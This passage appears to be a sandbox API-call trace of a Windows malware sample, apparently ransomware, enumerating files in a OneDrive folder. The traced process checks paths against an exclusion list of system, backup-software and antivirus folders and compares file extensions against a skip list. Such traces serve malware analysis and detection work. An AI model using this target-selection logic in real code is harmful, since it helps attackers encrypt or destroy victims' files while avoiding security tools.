lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.669] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0099.669] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.669] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0099.669] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.669] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0099.669] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.669] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0099.669] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.669] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.670] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0099.670] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.671] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0099.671] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0099.672] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.672] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.673] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0099.673] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.674] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0099.674] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.674] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0099.674] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\KA\\") returned 0x4b [0099.674] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf118 [0099.674] FindNextFileW (in: hFindFile=0x2cf118, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.674] FindNextFileW (in: hFindFile=0x2cf118, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.674] CharUpperBuffW (in: lpsz=".mui", cchLength=0x4 | out: lpsz=".MUI") returned 0x4 [0099.674] CharUpperBuffW (in: lpsz="FileSync.LocalizedResources.dll.mui", cchLength=0x23 | out: lpsz="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI") returned 0x23 [0099.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.677] CompareStringW 